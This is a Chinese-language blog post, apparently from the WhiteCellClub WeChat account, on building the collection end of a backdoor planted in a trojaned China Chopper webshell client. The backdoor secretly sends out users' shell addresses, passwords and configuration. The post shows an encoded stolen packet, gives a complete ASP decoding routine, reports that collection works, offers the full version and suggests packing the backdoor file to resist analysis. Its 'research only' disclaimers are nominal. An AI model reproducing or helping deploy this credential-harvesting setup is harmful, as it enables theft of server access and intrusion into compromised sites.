注:本文内容仅供技术研究,切勿用于非法用途!
相信各位都看过这篇中国菜刀仿冒官网三百万箱子爆菊记,肯定会有人像我一样想过:那么这个菜刀后门箱子该怎么制作呢?所以下面就来介绍介绍了~
首先,这个后门存在于菜刀的db.tmp中,用WinHex载入就能找到
这个是我修改过后的,用于本地做测试用
我们都知道,通常对软件后门的检测都是通过抓包来检验的,但这个后门却可以绕过多数抓包软件:
所以要想抓到数据包就要用点非主流的抓包工具~
但是,及时你能成功抓到包,你也会发现数据包是被加密的,没有关键的解密文件根本没有用
含有shell地址、密码、配置等信息的数据包:
593=%33%33%33%30%33%33%34%35%33%33%33%31%33%33%33%32%33%33%33%31%33%33%33%32%33%33%33%31%33%33%33%36%33%33%33%35%33%34%33%37%33%33%33%34%33%34%33%30%33%33%33%34%33%34%33%30%33%33%33%31%33%33%33%31%33%33%33%31%33%33%33%31%33%33%33%31%33%33%33%31%33%33%33%34%33%34%33%33%33%33%33%30%33%34%33%32%33%33%33%30%33%33%33%37%33%33%33%30%33%33%34%36%33%33%33%30%33%33%33%35%33%33%33%30%33%33%33%37%33%33%33%30%33%33%34%36%33%33%33%30%33%33%33%32%33%33%33%30%33%33%33%37%33%33%33%30%33%34%33%30%33%33%33%34%33%34%33%33%33%33%33%31%33%33%33%32%33%33%33%30%33%34%33%30%33%33%33%31%33%33%33%36%33%33%33%34%33%34%33%30%33%33%33%31%33%33%33%35%33%33%33%30%33%33%33%33%33%33%33%31%33%33%33%34%33%33%33%31%33%33%33%30%33%33%33%30%33%33%33%33%33%33%33%31%33%33%33%34%33%33%33%34%33%34%33%33%33%33%33%31%33%33%33%36%33%33%33%30%33%33%34%35%33%33%33%31%33%33%33%36%33%33%33%31%33%34%33%34%33%33%33%34%33%33%33%37%33%33%33%31%33%33%34%35%33%33%33%34%33%33%33%37%33%33%33%31%33%34%33%32%33%33%33%30%33%33%33%35%33%33%33%30%33%33%33%37%33%33%33%30%33%33%34%36%33%33%33%30%33%33%33%32%33%33%33%30%33%33%33%37%33%33%33%30%33%34%33%30%33%33%33%31%33%34%33%34%33%33%33%34%33%33%33%37%33%33%33%31%33%33%34%35%33%33%33%34%33%33%33%37%33%33%33%31%33%34%33%32%33%33%33%35%33%33%34%36%33%33%33%35%33%33%33%35%33%33%33%35%33%33%33%30%33%33%33%31%33%34%33%34%33%33%33%34%33%33%33%37%33%33%33%31%33%33%34%35%33%33%33%34%33%33%33%37%33%33%33%31%33%34%33%32%33%33%33%35%33%34%33%35%33%33%33%33%33%
所以这个后门箱子的重点就是解密函数了~下面贴出核心的解密函数
Public Function Decode(s)
Dim i, x
for i = 1 to len(s) step 2 ‘还原url编码
x = x & “%” & mid(s, i, 2)
next
x = UrlDecode(x) ‘调用下面的url编码还原函数
Dim y, a
for i = 1 to len(x) step 2 ‘将每对十六进制字符进行异或运算还原,然后再编码为十六进制
a = Int(“&H” & mid(x, i, 2)) ‘每对十六进制转换为十进制
a = a xor 6 ‘进行异或运算还原
y = y & chr(a) ‘还原Ascii码为字符
next
x = “”
for i = 1 to len(y) step 2 ‘还原url编码
x = x & “%” & mid(y, i, 2)
next
x = UrlDecode(x) ‘url编码还原
Decode = x
End FunctionPublic Function UrlDecode(S) ‘url编码还原函数
Dim I
For I = 1 To Len(S)
If Mid(S, I, 1) = “%” Then
If Int(“&H” & Mid(S, I + 1, 2)) > 127 Then
UrlDecode = UrlDecode & Chr(Int(“&H” & Mid(S, I + 1, 2) & Mid(S, I + 4, 2)))
I = I + 5
Else
UrlDecode = UrlDecode & Chr(Int(“&H” & Mid(S, I + 1, 2)))
I = I + 2
End If
Else
UrlDecode = UrlDecode & Mid(S, I, 1)
End If
Next
End Function
这个是ASP版的解密函数,网上某大牛公布出来的~(PS:我可没有那么牛的逆向解密功底囧)
有需要的朋友可以根据以上的源码写出PHP版的,或者可以找我要完整版的~
下面就来检验下这款后门箱子的使用情况:
可以完美收信~怕后门文件被抓到的,可以加个壳增加破解难度,具体自己测试
最后要提醒一下,本篇文章仅供技术参考与研究!不要以此去做违法事情!本作者不承担由此产生的一切法律责任!毕竟人外有人,天外有天~
再次感谢小亭学长在此期间对我的帮助!
至于本次用到的所有文件,请到我们WhiteCellClub团队的社区中寻找咯~
本文始发于微信公众号(WhiteCellClub):如何制作中国菜刀三百万后门箱子
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论